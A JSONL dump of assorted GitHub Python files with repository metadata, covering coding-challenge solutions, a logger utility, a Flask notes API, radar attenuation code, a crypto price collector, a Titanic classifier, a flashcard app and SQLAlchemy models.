+{"seq_id":"73816174568","text":"n=int(input())\nif(n==1):\n print(n)\nelse:\n count=0\n for i in range(1, (n//2)+1):\n for j in range(i, n+1):\n if(i*j<=n):\n count=count+1\n else:\n break\n print(count)\n","repo_name":"RajathRD/competitive-coding","sub_path":"SPOJ/AE00.py","file_name":"AE00.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13920928861","text":"import logging\nfrom typing import Optional\n\nlogger_initialized = {}\n\n\ndef get_logger(name: str,\n log_file: Optional[str] = None,\n log_level: int = logging.INFO,\n file_mode: str = 'w'):\n \"\"\"Initialize and get a logger by name.\n\n If the logger has not been initialized, this method will initialize the\n logger by adding one or two handlers, otherwise the initialized logger will\n be directly returned. During initialization, a StreamHandler will always be\n added. If `log_file` is specified, a FileHandler will also be added.\n Args:\n name (str): Logger name.\n log_file (str | None): The log filename. If specified, a FileHandler\n will be added to the logger.\n log_level (int): The logger level.\n file_mode (str): The file mode used in opening log file.\n Defaults to 'w'.\n Returns:\n logging.Logger: The expected logger.\n \"\"\"\n # use logger in mmengine if exist.\n try:\n from mmengine.logging import MMLogger\n if MMLogger.check_instance_created(name):\n logger = MMLogger.get_instance(name)\n else:\n logger = MMLogger.get_instance(\n name,\n log_file=log_file,\n log_level=log_level,\n file_mode=file_mode)\n return logger\n\n except Exception:\n pass\n\n logger = logging.getLogger(name)\n if name in logger_initialized:\n return logger\n # handle hierarchical names\n # e.g., logger \"a\" is initialized, then logger \"a.b\" will skip the\n # initialization since it is a child of \"a\".\n for logger_name in logger_initialized:\n if name.startswith(logger_name):\n return logger\n\n # handle duplicate logs to the console\n for handler in logger.root.handlers:\n if type(handler) is logging.StreamHandler:\n handler.setLevel(logging.ERROR)\n\n stream_handler = logging.StreamHandler()\n handlers = [stream_handler]\n\n if log_file is not None:\n # Here, the default behaviour of the official logger is 'a'. Thus, we\n # provide an interface to change the file mode to the default\n # behaviour.\n file_handler = logging.FileHandler(log_file, file_mode)\n handlers.append(file_handler)\n\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n for handler in handlers:\n handler.setFormatter(formatter)\n handler.setLevel(log_level)\n logger.addHandler(handler)\n\n logger.setLevel(log_level)\n logger_initialized[name] = True\n\n return logger\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/utils/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"}
+{"seq_id":"39813951570","text":"def caesar(s, n):\n s = list(s)\n for i in range(len(s)):\n if s[i].isupper():\n s[i]=chr((ord(s[i])-ord('A')+ n)%26+ord('A'))\n elif s[i].islower():\n s[i]=chr((ord(s[i])-ord('a')+ n)%26+ord('a'))\n\n return \"\".join(s)\n # 주어진 문장을 암호화하여 반환하세요.","repo_name":"cwadven/algorism_programmers","sub_path":"Level1/시저 암호H/clean_answer.py","file_name":"clean_answer.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18351081787","text":"from flask import Flask, jsonify, request\n\nimport mysql.connector\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"\",\n database=\"banco\"\n)\n\napp = Flask(__name__)\n\n#Create\n@app.route('/api/notas', methods=['POST'])\ndef add_nota():\n cursor = db.cursor()\n title = request.json['title']\n content = request.json['content']\n cursor.execute(\"INSERT INTO notas (title, content) VALUES (%s, %s)\", (title, content))\n db.commit()\n return jsonify({'message': 'Nota adicionada com sucesso'})\n\n\n#Read\n@app.route('/api/notas', methods=['GET'])\ndef get_notas():\n cursor = db.cursor()\n cursor.execute(\"SELECT * FROM notas\")\n notas = cursor.fetchall()\n return jsonify(notas)\n\n#Update\n@app.route('/api/notas/', methods=['PUT'])\ndef update_nota(id):\n cursor = db.cursor()\n title = request.json['title']\n content = request.json['content']\n cursor.execute(\"UPDATE notas SET title=%s, content=%s WHERE id=%s\", (title, content, id))\n db.commit()\n return jsonify({'message': 'Nota atualizada com sucesso'})\n\n#Delete\n@app.route('/api/notas/', methods=['DELETE'])\ndef delete_nota(id):\n cursor = db.cursor()\n cursor.execute(\"DELETE FROM notas WHERE id=%s\", (id,))\n db.commit()\n return jsonify({'message': 'Nota deletada com sucesso'})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"RafaelM4gn/python-backend-studies","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11598993452","text":"import inspect\nimport wradlib as wlb\nfrom .utilities import do_call, str2numeric_dict_args\n\ndef calculate_pia_dict_args(radar, pia = None,\n dbz_field = 'DBZ_F',\n kdp_field = 'KDP_F'):\n if pia is not None:\n if pia['use_pia']:\n if pia['pia_field'] in pia.keys():\n pia_args = pia[pia['pia_field']]\n pia_args = str2numeric_dict_args(pia_args)\n\n if pia['pia_field'] == 'dbz':\n args_constr = [k for k in pia_args.keys() if 'constraint' in k]\n if len(args_constr) > 0:\n args_pia = [k for k in pia_args.keys() if k not in args_constr]\n args_constr, pia_args = map(lambda keys: {x: pia_args[x] for x in keys}, [args_constr, args_pia])\n\n if args_constr['constraints'] == 'both':\n pia_args['constraints'] = [wlb.atten.constraint_dbz, wlb.atten.constraint_pia]\n pia_args['constraint_args'] = [[args_constr['constraint_args_dbz']], [args_constr['constraint_args_pia']]]\n elif args_constr['constraints'] == 'dbz':\n pia_args['constraints'] = [wlb.atten.constraint_dbz]\n pia_args['constraint_args'] = [[args_constr['constraint_args_dbz']]]\n elif args_constr['constraints'] == 'pia':\n pia_args['constraints'] = [wlb.atten.constraint_pia]\n pia_args['constraint_args'] = [[args_constr['constraint_args_pia']]]\n else:\n pia_args['constraints'] = None\n pia_args['constraint_args'] = None\n\n pia_args['dbz_field'] = dbz_field\n else:\n pia_args['kdp_field'] = kdp_field\n\n pia_args['pia_field'] = pia['pia_field']\n\n return calculate_pia(radar, **pia_args)\n else:\n return correct_attenuation(radar, pia_field = pia['pia_field'])\n else:\n return None\n else:\n return None\n\n# args_dbz = ['a_max', 'a_min', 'n_a', 'b_max', 'b_min', 'n_b', 'sector_thr',\n# 'constraint_args_dbz', 'constraint_args_pia']\n# num_dbz = [float, float, int, float, float, int, int, float, float]\n# for k in range(len(args_dbz)):\n# pia_args[args_dbz[k]] = num_dbz[k](pia_args[args_dbz[k]])\n\ndef calculate_pia(radar, **kwargs):\n args1 = inspect.getfullargspec(correct_attenuation).args[1:]\n args2 = inspect.getfullargspec(wlb.atten.correct_attenuation_constrained).args[1:]\n args3 = inspect.getfullargspec(wlb.atten.pia_from_kdp).args[1:]\n pia_args = args1 + args2 + args3\n\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n pia = do_call(correct_attenuation, args = [radar], kwargs = pia_kwargs)\n\n return pia\n\ndef correct_attenuation(radar, pia_field = 'dbz', dbz_field = 'DBZ_F',\n kdp_field = 'KDP_F', **kwargs):\n # path-integrated attenuation\n # pia_field: 'dbz' or 'kdp'\n dr = radar.range['meters_between_gates']/1000\n\n if pia_field == 'dbz':\n dbz = radar.fields[dbz_field]['data']\n pia_fun = wlb.atten.correct_attenuation_constrained\n pia_args = inspect.getfullargspec(pia_fun).args[1:]\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n if not 'gate_length' in kwargs:\n pia_kwargs['gate_length'] = dr\n pia = do_call(pia_fun, args = [dbz], kwargs = pia_kwargs)\n\n if pia_field == 'kdp':\n kdp = radar.fields[kdp_field]['data']\n pia_fun = wlb.atten.pia_from_kdp\n pia_args = inspect.getfullargspec(pia_fun).args[1:]\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n if not 'dr' in kwargs:\n pia_kwargs['dr'] = dr\n pia = do_call(pia_fun, args = [kdp], kwargs = pia_kwargs)\n\n return pia\n","repo_name":"rijaf-iri/mtorwaradar","sub_path":"mtorwaradar/util/pia.py","file_name":"pia.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1386976142","text":"from db_connector import engine\nfrom binance import ThreadedWebsocketManager\nfrom coinmarketcapapi import CoinMarketCapAPI\nfrom config import COINS, CRYPTO_TABLE_NAME\nfrom creds import MARKET_API_KEY, BINANCE_API_KEY, BINANCE_SECRET_KEY\nimport pandas as pd\nimport datetime\n\n\nclass MessageHandler():\n\n def __init__(self):\n self.last_hour = -1\n self.last_close = -1\n self.market_cap = self.get_market_cap()\n \n\n def handle_socket_message(self, msg):\n # Check if full minute passed\n if msg['k']['x']:\n df = pd.DataFrame([msg['k']])\n df = df.loc[:, ['t', 's', 'o', 'c', 'h', 'l', 'v', 'q']]\n df.columns = ['starttime', 'symbol', 'open',\n 'close', 'high', 'low', 'basevolume', 'quotevolume']\n df[\"market_cap\"] = 0\n symbol = df.loc[0, \"symbol\"]\n\n # Data Preperation\n df.open = df.open.astype(float)\n df.close = df.close.astype(float)\n df.high = df.high.astype(float)\n df.low = df.low.astype(float)\n df.market_cap = df.market_cap.astype(float)\n df.starttime = pd.to_datetime(df.starttime, unit=\"ms\")\n\n print(\"#############MARKET_CAP_TABLE#############\")\n print(self.market_cap)\n # Update market cap\n if self.last_hour != datetime.datetime.now().hour:\n self.market_cap = self.get_market_cap()\n self.last_hour = datetime.datetime.now().hour\n else:\n pct_change = 1\n if self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"].values[0] != -1:\n pct_change = df.loc[0, \"close\"] / self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"].values[0]\n self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"market_cap\"] *= pct_change\n print(pct_change)\n\n df[\"market_cap\"] = self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"market_cap\"].values[0]\n self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"] = df.loc[0, \"close\"]\n\n # Write to data base\n try:\n df.to_sql(CRYPTO_TABLE_NAME, engine, if_exists='append', index=False)\n except:\n print(\"DATABASE UNAVAILABLE SKIPPING WRITE\") \n print(\"#############WRITTEN DATA#############\")\n print(df)\n\n def get_market_cap(self):\n coins = \"\"\n for coin in COINS:\n coins += coin\n coins += \",\"\n coins = coins[:-1]\n coins\n\n cmc = CoinMarketCapAPI(api_key=MARKET_API_KEY)\n r = cmc.cryptocurrency_quotes_latest(symbol=coins, convert=\"EUR\")\n df = pd.DataFrame(r.data)\n df = df.transpose()\n df = df.drop([\"id\", \"name\",\"slug\",\"num_market_pairs\",\"date_added\",\"tags\", \"max_supply\",\"circulating_supply\",\"total_supply\",\"is_active\",\"platform\",\"cmc_rank\",\"is_fiat\",\"last_updated\"], axis=1)\n df[\"market_cap\"] = df[\"quote\"].apply(lambda x: x[\"EUR\"][\"market_cap\"])\n df = df.drop(\"quote\", axis=1)\n df[\"symbol\"] = df[\"symbol\"] + \"EUR\"\n df[\"last_close\"] = -1\n\n df.market_cap = df.market_cap.astype(float)\n df.last_close = df.last_close.astype(float)\n return df\n \n\n\nclass LiveDataCollector():\n\n def __init__(self):\n self.run = True\n self.twm = ThreadedWebsocketManager(\n api_key=BINANCE_API_KEY, api_secret=BINANCE_SECRET_KEY)\n\n def start(self):\n handler = MessageHandler()\n self.twm.start()\n\n # start any sockets here\n for coin in COINS:\n symbol = f\"{coin}EUR\"\n self.twm.start_kline_socket(\n callback=handler.handle_socket_message, symbol=symbol)\n print(f\"{symbol} socket started\")\n\n def stop(self):\n self.twm.stop()\n\n\nif __name__ == \"__main__\":\n ldc = LiveDataCollector()\n ldc.start()\n","repo_name":"chris-hoertnagl/market-analytics","sub_path":"coin_data_collector.py","file_name":"coin_data_collector.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"41904388234","text":"# https://leetcode.com/problems/intersection-of-two-arrays/\n\n\n# Given two arrays, write a function to compute their intersection.\n#\n# Example:\n# Given nums1 = [1, 2, 2, 1], nums2 = [2, 2], return [2].\n#\n# Note:\n# Each element in the result must be unique.\n# The result can be in any order.\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution(object):\n def preOrder(self, root, level, l):\n if root:\n if len(l) < level + 1:\n l.append([])\n if level % 2 == 0:\n l[level].append(root.val)\n else:\n l[level].insert(0, root.val)\n self.preOrder(root.left, level + 1, l)\n self.preOrder(root.right, level + 1, l)\n\n def zigzagLevelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n l = []\n self.preOrder(root, 0, l)\n return l\n","repo_name":"Kimice/Recoba","sub_path":"leetcode/binary-tree-zigzag-level-order-traversal.py","file_name":"binary-tree-zigzag-level-order-traversal.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33616963558","text":"# Leetcode Problem 3 \n# Oct 1 2020\ndef lengthOfLongestSubstring(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n cur_s = \"\"\n maxl = 0\n dic = {}\n for c in s:\n if c in dic:\n ret_ind = 0\n for i in range(len(cur_s)):\n if cur_s[i] == c:\n ret_ind = i\n break\n del dic[cur_s[i]]\n del dic[c]\n cur_s = cur_s[ret_ind+1:]\n dic[c] = c\n cur_s = cur_s + c\n if len(cur_s) > maxl:\n maxl = len(cur_s)\n return maxl\n\n# print(lengthOfLongestSubstring(\"abcabcbb\")==3)\n\n","repo_name":"HuiwenHe19/Leetcode","sub_path":"prob3.py","file_name":"prob3.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8394598245","text":"import json\nimport os\nfrom createClass import People, DIR_FILE, make_dump\n\nmake_dump()\n\nwith open(DIR_FILE, 'r', encoding='utf-8') as file:\n dict_el = json.load(file)\n\n p1 = People(**dict_el)\n\nprint(\"Nome:\",p1.name)\nprint(\"Ano de nascimento:\",p1.age)\nprint(\"Email:\",p1.email)\n","repo_name":"Thiago-Teofilo/curso_python","sub_path":"python_curso_completo/m05_intro_poo/aula206_classe_json/loadClass.py","file_name":"loadClass.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10814807444","text":"class Solution(object):\n def minOperations(self, nums, x):\n sums = sum(nums)\n if x>sums:\n return -1\n if x==sums:\n return len(nums)\n \n sums = sums-x\n cur, start, ans = 0, 0, -1\n \n for end in range(len(nums)):\n if cur < sums:\n cur+=nums[end]\n \n while cur>=sums:\n if cur==sums:\n ans = max(ans, end-start+1)\n cur -= nums[start]\n start+=1\n \n return len(nums)-ans if ans!=-1 else an\n\nclass Solution(object):\n def minOperations(self, nums, x):\n arr_sum = sum(nums)\n if arr_sum < x:\n return -1\n if arr_sum == x:\n return len(nums)\n \n required_subarray_sum = arr_sum - x\n left = curr_sum = max_subarray_size = 0\n for right, num in enumerate(nums):\n curr_sum += num\n while curr_sum > required_subarray_sum:\n curr_sum -= nums[left]\n left += 1\n if curr_sum == required_subarray_sum:\n max_subarray_size = max(max_subarray_size, right - left + 1)\n \n return len(nums) - max_subarray_size if max_subarray_size > 0 else -1 ","repo_name":"Ayushmanglani/competitive_coding","sub_path":"leetcode/Jan_2021/14_MinimumOperationsToReduceXtoZero.py","file_name":"14_MinimumOperationsToReduceXtoZero.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"72122434407","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom hatta.config import read_config\nfrom hatta.wiki import Wiki\n\n\n# Avoid WSGI errors, see http://mercurial.selenic.com/bts/issue1095\nsys.stdout = sys.__stdout__\nsys.stderr = sys.__stderr__\n\n\ndef application(env, start):\n \"\"\"Detect that we are being run as WSGI application.\"\"\"\n\n global application\n config = read_config()\n script_dir = os.path.dirname(os.path.abspath(__file__))\n if config.get('pages_path') is None:\n config.set('pages_path', os.path.join(script_dir, 'docs'))\n wiki = Wiki(config)\n application = wiki.application\n return application(env, start)\n\n\ndef main(config=None, wiki=None):\n \"\"\"Start a standalone WSGI server.\"\"\"\n\n config = config or read_config()\n wiki = wiki or Wiki(config)\n app = wiki.application\n\n host, port = (config.get('interface', '0.0.0.0'),\n int(config.get('port', 8080)))\n try:\n from cheroot import wsgi\n except ImportError:\n wsgi = None\n\n if wsgi is None:\n import werkzeug\n try:\n werkzeug.run_simple(host, port, app, use_reloader=False)\n except KeyboardInterrupt:\n pass\n else:\n name = wiki.site_name\n server = wsgi.Server((host, port), app,\n server_name=name)\n try:\n server.start()\n except KeyboardInterrupt:\n server.stop()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"davestgermain/hatta","sub_path":"hatta/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"17211737672","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\n# Load the training and test data\ntrain_df = pd.read_csv(\"train.csv\")\ntest_df = pd.read_csv(\"test.csv\")\n\n# Initial data exploration\ntrain_df.head()\ntrain_df.info()\ntrain_df.describe()\nsns.countplot(x='Survived', data=train_df)\n\n# Data preprocessing\ntrain_df.drop(columns=['Cabin'], inplace=True)\ntest_df.drop(columns=['Cabin'], inplace=True)\ntrain_df['Age'].fillna(train_df['Age'].mean(), inplace=True)\ntrain_df['Embarked'].fillna(train_df['Embarked'].mode()[0], inplace=True)\ntest_df['Age'].fillna(test_df['Age'].mean(), inplace=True)\ntest_df['Fare'].fillna(test_df['Fare'].mean(), inplace=True)\n\n# Feature engineering\ntrain_df['Title'] = train_df['Name'].apply(lambda x: x.split(',')[1].split('.')[0].strip())\ntest_df['Title'] = test_df['Name'].apply(lambda x: x.split(',')[1].split('.')[0].strip())\ntrain_df['Title'].replace(['Dr', 'Rev', 'Col', 'Major', 'Jonkheer', 'Capt'], 'Rare', inplace=True)\ntrain_df['Title'].replace(['Ms', 'Mlle'], 'Miss', inplace=True)\ntest_df['Title'].replace(['Dr', 'Rev', 'Col', 'Major', 'Jonkheer', 'Capt'], 'Rare', inplace=True)\ntest_df['Title'].replace(['Ms', 'Mlle'], 'Miss', inplace=True)\n\n# Select the relevant features and target variable\nX_train = train_df[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked', 'Title']]\ny_train = train_df['Survived']\nX_test = test_df[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked', 'Title']]\n\n# One-hot encode the categorical features\nX_train = pd.get_dummies(X_train)\nX_test = pd.get_dummies(X_test)\n\n# Create a random forest classifier and fit it on the training data\nrf = RandomForestClassifier(n_estimators=100, random_state=42)\nrf.fit(X_train, y_train)\n\n# Use the trained model to make predictions on the test data\ny_pred = rf.predict(X_test)\n\n# Save the predictions in a CSV file\nsubmission_df = pd.DataFrame({'PassengerId': test_df['PassengerId'], 'Survived': y_pred})\nsubmission_df.to_csv('submission.csv', index=False)\n","repo_name":"jm0rt1/value-investing-data-mining","sub_path":"docs/examples/obselete/predicting_titanic_survival.py","file_name":"predicting_titanic_survival.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"42298973567","text":"BACKGROUND_COLOR = \"#B1DDC6\"\n\nfrom tkinter import *\nimport pandas\nimport random\n\ncurrent_card = {}\ndata_dict = {}\n\ntry:\n data = pandas.read_csv('data/words_to_learn.csv')\nexcept FileNotFoundError:\n original_data = pandas.read_csv('data/french_words.csv')\n data_dict = original_data.to_dict(orient=\"records\")\nelse:\n data_dict = data.to_dict(orient=\"records\")\n\n\n\ndef next_card():\n global current_card, flip_timer\n window.after_cancel(flip_timer)\n current_card = random.choice(data_dict)\n canvas.itemconfig(language, text=\"French\", fill=\"black\")\n canvas.itemconfig(question, text=current_card[\"French\"], fill=\"black\")\n canvas.itemconfig(canvas_image, image=front_img)\n flip_timer = window.after(3000, flip_card)\n\n\ndef flip_card():\n canvas.itemconfig(canvas_image, image=back_img)\n canvas.itemconfig(language, text=\"English\", fill=\"white\")\n canvas.itemconfig(question, text=current_card[\"English\"], fill=\"white\")\n\n\ndef is_known():\n data_dict.remove(current_card)\n data = pandas.DataFrame(data_dict)\n data.to_csv(\"data/words_to_learn.csv\", index=False)\n next_card()\n\n\nwindow = Tk()\nwindow.title(\"Flashy\")\nwindow.config(bg=BACKGROUND_COLOR, padx=50, pady=50)\n\nflip_timer = window.after(3000, flip_card)\n\ncanvas = Canvas(width=800, height=526, highlightthickness=0, bg=BACKGROUND_COLOR)\nback_img = PhotoImage(file=\"images/card_back.png\")\nfront_img = PhotoImage(file=\"images/card_front.png\")\ncanvas_image = canvas.create_image(400, 263, image=front_img)\n\nlanguage = canvas.create_text(400, 150, text=\"French\", font=(\"Arial\", 40, \"italic\"))\nquestion = canvas.create_text(400, 283, text=\"SubTitle\", font=(\"Arial\", 60, \"italic\"))\ncanvas.grid(column=0, row=0, columnspan=2)\n\n\nwrong_img = PhotoImage(file=\"images/wrong.png\")\nwrong_button = Button(image=wrong_img, highlightthickness=0, command=next_card)\nwrong_button.grid(column=0, row=1)\n\nright_img = PhotoImage(file=\"images/right.png\")\nright_button = Button(image=right_img, highlightthickness=0, command=is_known)\nright_button.grid(column=1, row=1)\n\nnext_card()\n\nwindow.mainloop()\n\n","repo_name":"NilGamer/flash_card_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22862660976","text":"with open('day9/data.txt') as f:\n data = f.readlines()\n\nfor i in range(len(data)-1):\n data[i] = int(data[i][:-1])\n\ndata[len(data)-1] = int(data[len(data)-1])\n\n\nfor i in range(25,len(data)):\n start = i - 25\n end = i - 1\n to_parse = sorted(data[start:end+1])\n lo = 0\n hi = len(to_parse)-1\n while lo <= hi:\n if lo == hi:\n print(data[i])\n break\n else:\n if to_parse[lo]+ to_parse[hi] < data[i]:\n lo+=1\n #print(lo)\n elif to_parse[lo] + to_parse[hi] > data[i]:\n hi-=1\n #print(hi)\n else:\n break\n \n \n","repo_name":"nguyenethan01/advent2020","sub_path":"day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34737163056","text":"from django.db import models\n\n\nclass AnoContabil(models.Model):\n '''\n A classe AnoContabil serve para registrarmos os anos contábeis.\n Além de fazer as implementações relacionadas a um único ano contábil.\n '''\n\n nome = models.CharField(\n verbose_name='Nome',\n max_length=100\n )\n\n data_inicial = models.DateField(\n verbose_name='Data inicial'\n )\n\n data_final = models.DateField(\n verbose_name='Data final'\n )\n\n aberto = models.BooleanField(\n verbose_name='Aberto?',\n default=False\n )\n\n def __str__(self):\n return self.nome\n\n class Meta:\n app_label = 'financeiro'\n verbose_name = 'Ano contábil'\n verbose_name_plural = 'Anos contábeis'\n","repo_name":"TimeNovaData/app_financeiro","sub_path":"models/ano_contabil.py","file_name":"ano_contabil.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19096375842","text":"class Solution:\n def largestNumber(self, nums: List[int]) -> str:\n for i,n in enumerate(nums):\n nums[i]=str(n)\n def compare(n1,n2):\n if n1+n2>n2+n1:\n return -1\n else:\n return 1\n nums=sorted(nums,key=cmp_to_key(compare))\n #[0,0,0]=\"000\" must be retured as \"0\" so to do this first we convert it to int then to string\n return str(int(\"\".join(nums)))\n \n \n ","repo_name":"kalebwondimu33/LeetcodeSolutions","sub_path":"0179-largest-number/0179-largest-number.py","file_name":"0179-largest-number.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8616776099","text":"from django.core.management.base import BaseCommand\nfrom rooms import models as room_models\n\n\nclass Command(BaseCommand):\n\n help = \"This command creates houserules\"\n # def add_arguments(self, parser):\n # parser.add_argument(\"--times\", help=\"how many times\")\n\n def handle(self, *args, **options):\n houserules = [\n \"키패드로 셀프 체크인\",\n \"열쇠 보관함으로 체크인\",\n \"안내 직원(으)로 셀프 체크인\",\n \"흡연 금지\",\n \"반려동물 동반 불가\",\n \"어린이와 유아에게 적합하지 않음\",\n \"파티 또는 이벤트 금지\",\n ]\n\n for r in houserules:\n room_models.HouseRule.objects.create(name=r)\n\n self.stdout.write(self.style.SUCCESS(\"Houserules Created\"))","repo_name":"GisangLee/fullstack_practice","sub_path":"rooms/management/commands/seed_houserules.py","file_name":"seed_houserules.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"34402295712","text":"\nfrom sqlalchemy import Column, Index\nfrom sqlalchemy import String, Integer, Date, DateTime, Float, Numeric, ForeignKey\nfrom sqlalchemy.types import ARRAY, JSON\nfrom sqlalchemy import and_, or_\nfrom sqlalchemy.dialects.postgresql import UUID\n\nfrom sqlalchemy.orm import relationship, backref\n\nfrom openapi_server.models.attr import Attr as AttrApi\n\nfrom backbone_server.model.mixins import Base\nfrom backbone_server.model.study import Study\n\nclass Attr(Base):\n\n\n study_id = Column('study_id',\n UUID(as_uuid=True),\n ForeignKey('study.id'))\n attr_type = Column(String(256), index=True)\n attr_value_str = Column(String(256), index=True)\n attr_value_int = Column(Integer, index=True)\n attr_value_float = Column(Float, index=True)\n attr_value_decimal = Column(Numeric, index=True)\n attr_value_date = Column(Date, index=True)\n attr_value_datetime = Column(DateTime, index=True)\n attr_value_list_int = Column(ARRAY(Integer))\n attr_value_object = Column(JSON)\n attr_source = Column(String(256))\n\n study = relationship('Study',\n backref=backref('attr'))\n\n openapi_class = AttrApi\n\n def submapped_items(self):\n return {\n 'study_name': 'study.name',\n }\n\n @staticmethod\n def get_query(db, api_attr, value_type=None, user=None):\n\n study_id = None\n if not api_attr.attr_value:\n return None\n if value_type:\n value_type = 'attr_value_' + value_type\n else:\n value_type = 'attr_value_' + type(api_attr.attr_value).__name__\n if value_type == 'attr_value_list':\n value_type = value_type + '_' + type(api_attr.attr_value[0]).__name__\n if isinstance(api_attr.attr_value, str):\n import urllib\n api_attr.attr_value = urllib.parse.unquote_plus(api_attr.attr_value)\n\n attr_query = db.query(Attr).filter(and_(Attr.attr_type == api_attr.attr_type,\n Attr.__table__.c[value_type] == api_attr.attr_value))\n if api_attr.attr_source:\n attr_query = attr_query.filter(or_(Attr.attr_source == api_attr.attr_source, Attr.attr_source == None))\n if api_attr.study_name:\n study = Study.get_or_create_study(db, api_attr.study_name, user)\n study_id = study.id\n attr_query = attr_query.filter(or_(Attr.study_id == study_id, Attr.study_id == None))\n\n return attr_query\n\n @staticmethod\n def get(db, api_attr, value_type=None, user=None):\n\n query = Attr.get_query(db, api_attr, value_type, user=user)\n\n if query:\n return query.first()\n return None\n\n @staticmethod\n def get_or_create(db, api_attr, value_type=None, user=None):\n\n attr = Attr.get(db, api_attr, value_type, user=user)\n\n if attr is None:\n study_id = None\n if api_attr.study_name:\n study = Study.get_or_create_study(db, api_attr.study_name, user)\n study_id = study.id\n attr = Attr(attr_type=api_attr.attr_type,\n attr_source=api_attr.attr_source,\n study_id=study_id)\n if not value_type:\n value_type = 'attr_value_' + type(api_attr.attr_value).__name__\n setattr(attr, value_type, api_attr.attr_value)\n db.add(attr)\n db.commit()\n attr = Attr.get(db, api_attr)\n\n return attr\n\n @staticmethod\n def get_all(db, api_attr, value_type=None, user=None):\n\n\n query = Attr.get_query(db, api_attr, value_type, user=user)\n\n if not query:\n return\n\n for attr in query.all():\n yield attr\n\n study = relationship(\"Study\")\n def __repr__(self):\n return f''''''\n\nIndex('idx_attr_index', Attr.attr_type, Attr.attr_value_str)\n","repo_name":"malariagen/sims-backbone","sub_path":"server/backbone_server/model/attr.py","file_name":"attr.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
